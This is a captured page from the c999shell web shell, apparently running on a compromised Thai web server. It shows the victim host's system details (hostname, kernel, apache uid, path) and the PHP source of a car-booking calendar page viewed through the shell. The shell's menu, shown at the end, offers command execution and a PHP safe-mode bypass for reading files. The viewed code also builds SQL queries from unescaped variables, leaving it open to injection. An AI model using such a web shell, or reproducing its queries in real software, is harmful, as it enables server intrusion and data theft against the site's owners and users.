Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?
/** Define Validate Access */
define( '_VALID_ACCESS', 1 );
/** Configuration */
require_once( "./configuration.php" );
require_once( $_Config_absolute_path . "/includes/framework.php" );
require_once( "./include/Function.php" );
require_once( "./include/FunctionDB.php" );
require_once( "./calendar/check.php" );
require_once( "./calendar/cal_func.php" );
/** Create Database Object */
$dbObj = new DBConn;
//=== SESSION
$Username = $valid_user;
/** Config Table for This Page */
$myTable1 = "personal_tb";
$myTable2 = "formcaroffice";
$myTable3 = "province";
$myTable4 = "training_tb";
/** Table --> tech_plan_tb */
$query1 = " SELECT * FROM $myTable2 WHERE DateCar= '$now_stamp' ";
$result1 = $dbObj->execQuery($query1);
$rs1 = $dbObj->fetchArray($result1);
$numrows = $dbObj->_numrows;
//$Teacher_code = $rss['Teacher_code'];
/** Table --> techplan_method_tb */
$query2 = " SELECT * FROM $myTable3 WHERE ProvinceId='$rs1[ProvinceId]' ";
$result2 = $dbObj->execQuery($query2);
$rs2 = $dbObj->fetchArray($result2);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - แก้ไขข้อมูลแผนการสอน</title>
</head>
<table width="547" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="547" align="center" valign="top" style="padding:10px 0px 5px 10px; font-weight: bold;"><fieldset>
<table width="507" height="274" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#0000FF">
<tr>
<td width="496" height="32" align="left" bgcolor="#FFFFFF">ปฏิทินการจองรถยนต์ วันที่ <? echo dateThai($now_stamp); ?></td>
</tr>
<tr>
<td height="242" align="center"><?php do { ?>
<table width="99%" border="0" align="center" cellpadding="1" cellspacing="2">
<tr bgcolor="#CCCCCC">
<td height="18" colspan="2" align="left" bgcolor="#FFFFFF">รถยนต์คันที่ <?php echo ++$i;?>
<?
$sql = "Select * From automobile_tb Where CarmoId ='$rs1[CarmoId]' ";
$result2 = mysql_query($sql) or die("Error".mysql_error());
$rs2 = mysql_fetch_array($result2);
echo "$rs2[CodeNo]";?></td>
</tr>
<tr bgcolor="#CCCCCC">
<td height="18" colspan="2" align="left" bgcolor="#FFFFFF"><?php echo $rs1['CarNo'];?></td>
</tr>
<tr>
<td colspan="2">ไปราชการที่
<input name="makeWord" type="text" id="makeWord" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="40" value="<?=$rs1["makeWord"]; ?>"/>
</font> ผู้ร่วมเดินทาง
<input name="Make" type="text" id="Make" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="1" value="<? echo $rs1["Make"]; ?>" />
คน</a></td>
</tr>
<tr>
<td colspan="2">จังหวัด
<input name="ProvinceId" type="text" id="ProvinceId" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="20" value=" <?php
$query2 = " SELECT * FROM $myTable3 WHERE provinceId='$rs1[provinceId]' ";
$result2 = $dbObj->execQuery($query2);
$rs2 = $dbObj->fetchArray($result2);
echo $rs2[provinceName];
?>" /></td>
</tr>
<tr>
<td colspan="2">เพื่อ</a>
<input name="MakePer2" type="text" id="MakePer2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="70" value="<? echo $rs1["Training_name"]; ?>"/></td>
</tr>
<tr>
<td colspan="2">หมายเหตุ
<input name="Detail2" type="text" id="Detail2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? echo $rs1["Detail"]; ?>" size="60" /></td>
</tr>
<tr>
<td colspan="2">ในวันที่
<input name="Date_start2" type="text" id="Date_start2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="15" value=" <?php
$sday = $rs1[Date_start];
$yearthai = explode("-",$sday);
$day = intval($yearthai[2]);
$month = intval($yearthai[1]);
$year = intval($yearthai[0]+543);
//////////////////
// $yearthai = $day ;
$m = getThaiSubMonth($month);
echo"$day"." "."$m"." "."$year";
?>" />
ถึงวันที่
<input name="Date_finish2" type="text" id="Date_finish2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="15" value=" <?php
$sday = $rs1[Date_finish];
$yearthai = explode("-",$sday);
$day = intval($yearthai[2]);
$month = intval($yearthai[1]);
$year = intval($yearthai[0]+543);
//////////////////
// $yearthai = $day ;
$m = getThaiSubMonth($month);
echo"$day"." "."$m"." "."$year";
?>" />
เวลา
<input name="Personly2" type="text" id="Personly4" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs1['Time_start'];?> - <?=$rs1['Time_finish'];?>" size="10" onkeypress="checkNumeric()" />
</font></td>
</tr>
<tr>
<td colspan="2"> รถยนต์
<input name="CarmoId" type="text" id="CarmoId2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?
$sql = "Select * From automobile_tb Where CarmoId ='$rs1[CarmoId]' ";
$result2 = mysql_query($sql) or die("Error".mysql_error());
$rs2 = mysql_fetch_array($result2);
echo "$rs2[Acc_name] ยี่ห้อ $rs2[Kind] ทะเบียน $rs2[CodeNo]";?>" size="60" /></td>
</tr>
<tr>
<td colspan="2">พนักงานขับรถ
<input name="name2" type="text" id="name2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?
$name1 = $rs1["name1"];
$sql = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'";
$result3 = mysql_query($sql) or die("Error".mysql_error());
$rs3 = mysql_fetch_array($result3);
echo "$rs3[First_name] $rs3[Teacher_name] $rs3[Teacher_lastname]";?>" size="30" /></td>
</tr>
<tr>
<td colspan="2" align="left">ผู้ขอใช้:
<?php
$query = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE Teacher_code='$rs1[Teacher_code]' ";
$result = $dbObj->execQuery($query);
$rss = $dbObj->fetchArray($result); ?>
<? echo $rss[First_name]?> <? echo $rss[Teacher_name]?> <? echo $rss[Teacher_lastname]?></td>
</tr>
<tr>
<td colspan="2" align="left">สถานะการขอใช้รถยนต์ : <?php if($rs1["Status"] == "อนุมัติ" ) echo 'อนุมัติ'; ?>
<?php if($rs1["Status"] == "ไม่อนุมัติ" ) echo 'ไม่อนุมัติ'; ?>
<?php if($rs1["Status"] == "รออนุมัติ" ) echo 'รออนุมัติ'; ?></td>
</tr>
<tr>
<td width="36%"></td>
<td width="64%"> </td>
</tr>
<tr>
<td colspan="2"><hr /></td>
</tr>
</table>
<?php } while ($rs1 = $dbObj->fetchArray($result1)); ?>
จำนวน <?php echo $numrows ?> รายการ</a></td>
</tr>
</table>
</fieldset></td>
</tr>
</table>
<p>
<?php
/** Free Resource */
$dbObj->freeresult($result1);
/** Close the Database */
$dbObj->disconn();
/** Unset Class */
unset($dbObj);
?>
</p> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |